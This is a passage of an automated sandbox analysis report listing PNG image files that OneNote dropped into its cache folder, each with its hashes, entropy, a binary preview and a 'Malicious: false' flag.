Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s\|.....C.$@.$.....t.!........8......RR....<...6..P\|\|....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O\|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.\|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e.....UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ).(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....\|g..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004G.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	22634
Entropy (8bit):	7.974332204835705
Encrypted:	false
SSDEEP:	384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
MD5:	548D234C9AB4021CA5FAB7BF22502465
SHA1:	2F7495D250DC86EA99473CC342D164B859926021
SHA-256:	7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
SHA-512:	261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
Malicious:	false
Preview:	.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O\|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../\|.O........7_...Oj....\|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[\|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.\|..kv....];j\|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9\|.m.+`).\|......x..vak-].../.....G'....4.>B6$.......-o.q..L;.N+....>...=.!.Y..Q...?......7..,....}

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004H.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13737
Entropy (8bit):	7.916899917415529
Encrypted:	false
SSDEEP:	384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
MD5:	830632032C7DDBCCDE126F4BAE935540
SHA1:	9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
SHA-256:	2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
SHA-512:	5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
Malicious:	false
Preview:	.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!............9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!............9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004I.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13241
Entropy (8bit):	7.931391290415517
Encrypted:	false
SSDEEP:	384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
MD5:	01367FEEE0A83E8765E971E0D3740900
SHA1:	CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
SHA-256:	18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
SHA-512:	8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
Malicious:	false
Preview:	.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......EX........wo9..9.\|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~..U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J.w.mdv.&..@....R..o/.^..5...x.g.>..ag....GM\|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B\|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004J.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4490
Entropy (8bit):	7.928016176674318
Encrypted:	false
SSDEEP:	96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
MD5:	7F161B19B937AB48D4FD2F6E5E16FDBD
SHA1:	BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
SHA-256:	C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
SHA-512:	E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
Malicious:	false
Preview:	.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.\|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.\|...\.z..6j>..n....Y.&G.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P.....'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^.....W..?}t...{.B.8..D...UPa..~..C...\|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.......G...K.....e...b.\|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004K.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	17289
Entropy (8bit):	7.962998633267186
Encrypted:	false
SSDEEP:	384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
MD5:	708E8EB906BC105CCA0535AE669AA651
SHA1:	38D82DEDFE97D3001188C2E18FE13BD741FD520F
SHA-256:	1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
SHA-512:	1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }...B@....i<8.....B@.T2 .........xp..! .....d@...!......(B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'\|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004L.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2332
Entropy (8bit):	7.8822150338370776
Encrypted:	false
SSDEEP:	48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
MD5:	91CB7F1273AA003076401081B8A22237
SHA1:	5157144069E7D2FDAE60B397BE5851E75BDF7707
SHA-256:	80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
SHA-512:	5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
Malicious:	false
Preview:	.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r\|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..\|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004M.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	16003
Entropy (8bit):	7.959532793770661
Encrypted:	false
SSDEEP:	384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
MD5:	3A5CD52E925A7C4A345047D8F06C3C41
SHA1:	9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
SHA-256:	477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
SHA-512:	8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..\|.....+)..H..C.K... ....x).rU..T..E...;.....@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8RD.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z.GJ...."@zJ}...." ...Si8RD.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[\|\|...t.T.w .. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004N.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1924
Entropy (8bit):	7.836744258175623
Encrypted:	false
SSDEEP:	24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
MD5:	B1FDE66F75507567B5F0C6C07B01A3A1
SHA1:	80B8E6A923E853232F66C874367E90B5C9CAD7AE
SHA-256:	B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
SHA-512:	FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
Malicious:	false
Preview:	.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M..J.....".4....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o\|.?.......;C\|.#.../v.H.......o~.{G......H.\|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P\|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O\|.D...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004O.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4190
Entropy (8bit):	7.94161730428269
Encrypted:	false
SSDEEP:	96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
MD5:	8B3AEC1986A522951942BA72B85CCAA0
SHA1:	7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
SHA-256:	8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
SHA-512:	8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
Malicious:	false
Preview:	.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...\|\|...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...\|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004P.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4181
Entropy (8bit):	7.943341403425058
Encrypted:	false
SSDEEP:	96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
MD5:	817D5A35EDB2B0E052194D4F49FDA19C
SHA1:	FA6CB2016C5F43B76102B63D60359139227E07EA
SHA-256:	0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
SHA-512:	E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
Malicious:	false
Preview:	.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b...%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....\|=.#.=.32..o.<.TnQ....g.zN...n...!/.........!....F..]...6...m...CX..~...+..U...E.\|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}.....N...N.\|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv\|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004Q.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	8184
Entropy (8bit):	7.807848176906598
Encrypted:	false
SSDEEP:	192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
MD5:	5B386BF9A20766956A84F67F913F23D7
SHA1:	6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
SHA-256:	DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
SHA-512:	99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
Malicious:	false
Preview:	.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..\|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.\|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004R.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4181
Entropy (8bit):	7.950380155401321
Encrypted:	false
SSDEEP:	96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
MD5:	BC6C08F8C2C6D1EEE95ABFC40C3C3669
SHA1:	44DE7375375880ACC24938D7E92A837E85C35321
SHA-256:	6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
SHA-512:	2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
Malicious:	false
Preview:	.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_...c..n.......?....wa..l...p....E.Ly.}......C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<\|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...\|....\..O.....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...\|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..k.Y....z.;?..^...3.4\|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004S.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2599
Entropy (8bit):	7.903700862190034
Encrypted:	false
SSDEEP:	48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
MD5:	E88131C9AAC52649FF044905ACAB9B76
SHA1:	34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
SHA-256:	30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
SHA-512:	97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
Malicious:	false
Preview:	.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B\|E..>.....Q........b[.K........m.(..... ...!%1%-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.\|...Yszl.N.:......KPs.):).T.5...&B.....5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.\|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......\|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.\|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004T.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1570
Entropy (8bit):	7.780157858994452
Encrypted:	false
SSDEEP:	48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
MD5:	EF9AA5B2ADBE5DF68AC4F4D716DF7708
SHA1:	363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
SHA-256:	3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
SHA-512:	EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
Malicious:	false
